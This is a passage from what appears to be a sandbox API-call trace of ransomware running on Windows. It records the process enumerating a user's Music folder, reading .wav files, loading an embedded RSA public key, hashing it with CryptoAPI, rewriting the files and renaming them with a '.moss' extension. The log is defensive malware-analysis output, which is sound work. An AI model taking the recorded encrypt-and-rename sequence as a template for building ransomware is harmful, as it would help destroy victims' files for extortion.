[0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0171.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0171.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0171.609] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0171.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0171.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dec0 [0171.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0171.610] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0171.610] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ded8 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dea8 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4def0 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0171.611] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0171.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dec0 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dec0 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48820 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa27b8 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2470 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dec0 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48a38 [0171.612] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0171.612] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0171.613] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8958, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.613] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\M2WH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\m2wh.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\M2WH.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\m2wh.wav.moss")) returned 1 [0171.617] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\TyBhlhBVzmcnSF.wav") returned=".wav" [0171.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\TyBhlhBVzmcnSF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\tybhlhbvzmcnsf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.617] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=47396) returned 1 [0171.617] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.621] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xb8fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.621] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.621] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xb924, lpOverlapped=0x0) returned 1 [0171.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.621] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.621] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.622] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.623] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.623] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.623] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.623] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.623] GetLastError () returned 0x0 [0171.623] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.623] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.623] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.623] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.623] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.623] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.624] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.624] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.624] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xb924, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.624] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.625] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\TyBhlhBVzmcnSF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\tybhlhbvzmcnsf.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\TyBhlhBVzmcnSF.wav.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dencirfhvvvix5\\tybhlhbvzmcnsf.wav.moss")) returned 1 [0171.627] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.627] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0171.627] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.627] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HCQjXtcJ8s9B2R_\\") returned="HCQjXtcJ8s9B2R_\\" [0171.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b50 [0171.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cad8 [0171.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.627] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0171.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4caa8 [0171.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0171.627] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0171.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0171.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4caa8 | out: hHeap=0xcd0000) returned 1 [0171.628] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0171.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0171.628] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0171.628] PathFindFileNameW (pszPath="") returned="" [0171.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HCQjXtcJ8s9B2R_\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0171.629] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.629] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.629] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0171.629] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.629] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.629] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0171.629] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.629] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0171.629] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.629] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.629] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2dd98 | out: hHeap=0xcd0000) returned 1 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2dd98 [0171.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: 